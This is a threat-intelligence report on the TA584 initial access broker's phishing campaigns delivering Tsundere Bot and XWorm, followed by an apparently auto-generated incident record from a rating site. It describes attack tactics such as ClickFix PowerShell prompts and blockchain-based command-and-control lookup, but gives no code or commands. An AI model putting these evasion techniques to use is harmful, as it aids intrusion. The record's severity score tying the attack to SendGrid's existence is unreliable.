TA584 Initial Access Broker Expands Operations with Tsundere Bot and XWorm in Ransomware-Linked Campaigns
A prolific initial access broker (IAB) tracked as TA584 has escalated its activity, deploying the Tsundere Bot malware alongside the XWorm remote access trojan (RAT) to compromise networks likely as a precursor to ransomware attacks. Researchers at Proofpoint, who have monitored the group since 2020, report a threefold increase in TA584’s campaign volume in late 2025, expanding its targeting beyond traditional regions (North America, UK/Ireland) to include Germany, other European countries, and Australia.
Attack Chain & Tactics
TA584’s latest campaigns begin with phishing emails sent via compromised, aged accounts using SendGrid and Amazon SES. Each target receives a unique URL, with geofencing, IP filtering, and redirect chains (often leveraging Keitaro TDS) to evade detection. Victims who bypass these filters encounter a CAPTCHA page, followed by a ClickFix prompt instructing them to execute a PowerShell command a tactic designed to bypass static defenses.
The command fetches an obfuscated script that loads XWorm or Tsundere Bot into memory, while the browser redirects to a benign site to mask the infection. TA584 has historically deployed a range of payloads, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT (still observed in 2025).
Tsundere Bot: A Malware-as-a-Service Threat
Originally documented by Kaspersky in 2024 and linked to a Russian-speaking operator (with ties to 123 Stealer), Tsundere Bot functions as both a backdoor and loader. Key features include:
- Node.js dependency: The malware installs Node.js on victim systems via its command-and-control (C2) panel.
- Blockchain-based C2 retrieval: Uses a variant of EtherHiding to fetch C2 addresses from the Ethereum blockchain, with a hardcoded fallback.
- WebSocket communication: Evades traditional network monitoring.
- Geofencing: Aborts execution if the system locale matches CIS (Commonwealth of Independent States) languages, suggesting Russian origin.
- Data exfiltration & lateral movement: Collects system information, executes arbitrary JavaScript, and can turn infected hosts into SOCKS proxies.
- Bot marketplace: Operators can buy and sell access to compromised machines.
Broader Implications
Proofpoint assesses with high confidence that Tsundere Bot infections could lead to ransomware deployment, given TA584’s history of facilitating such attacks. The group’s expanded targeting and experimentation with payloads suggest a growing threat, with researchers anticipating further diversification in victims and attack methods.
SendGrid cybersecurity rating report: https://www.rankiteo.com/company/sendgrid
"id": "SEN1769647301",
"linkid": "sendgrid",
"type": "Cyber Attack",
"date": "10/2025",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'location': ['North America',
'UK/Ireland',
'Germany',
'other European countries',
'Australia'],
'type': ['organizations', 'enterprises']}],
'attack_vector': ['phishing emails',
'compromised aged accounts',
'unique URLs with geofencing/IP filtering',
'ClickFix prompt with PowerShell execution'],
'data_breach': {'data_exfiltration': 'possible (Tsundere Bot and XWorm '
'capabilities)',
'personally_identifiable_information': 'possible',
'sensitivity_of_data': ['high (if PII is exfiltrated)'],
'type_of_data_compromised': ['system information',
'potential PII']},
'date_detected': '2025',
'description': 'A prolific initial access broker (IAB) tracked as TA584 has '
'escalated its activity, deploying the Tsundere Bot malware '
'alongside the XWorm remote access trojan (RAT) to compromise '
'networks likely as a precursor to ransomware attacks. The '
'group has expanded its targeting beyond traditional regions '
'(North America, UK/Ireland) to include Germany, other '
'European countries, and Australia, with a threefold increase '
'in campaign volume in late 2025.',
'impact': {'data_compromised': ['system information',
'potential personally identifiable '
'information (PII)'],
'identity_theft_risk': ['high (if PII is exfiltrated)'],
'operational_impact': ['potential lateral movement',
'data exfiltration'],
'systems_affected': ['compromised networks', 'infected hosts']},
'initial_access_broker': {'backdoors_established': ['Tsundere Bot', 'XWorm'],
'entry_point': ['phishing emails',
'compromised aged accounts']},
'investigation_status': 'ongoing (monitored since 2020)',
'motivation': ['financial gain', 'facilitating ransomware attacks'],
'post_incident_analysis': {'root_causes': ['phishing attacks',
'exploitation of aged accounts',
'obfuscated PowerShell scripts']},
'ransomware': {'data_exfiltration': 'possible (Tsundere Bot and XWorm '
'capabilities)'},
'references': [{'source': 'Proofpoint'}, {'source': 'Kaspersky'}],
'response': {'third_party_assistance': 'Proofpoint (research and monitoring)'},
'threat_actor': 'TA584',
'title': 'TA584 Initial Access Broker Expands Operations with Tsundere Bot '
'and XWorm in Ransomware-Linked Campaigns',
'type': ['phishing',
'malware',
'initial access broker activity',
'potential ransomware precursor']}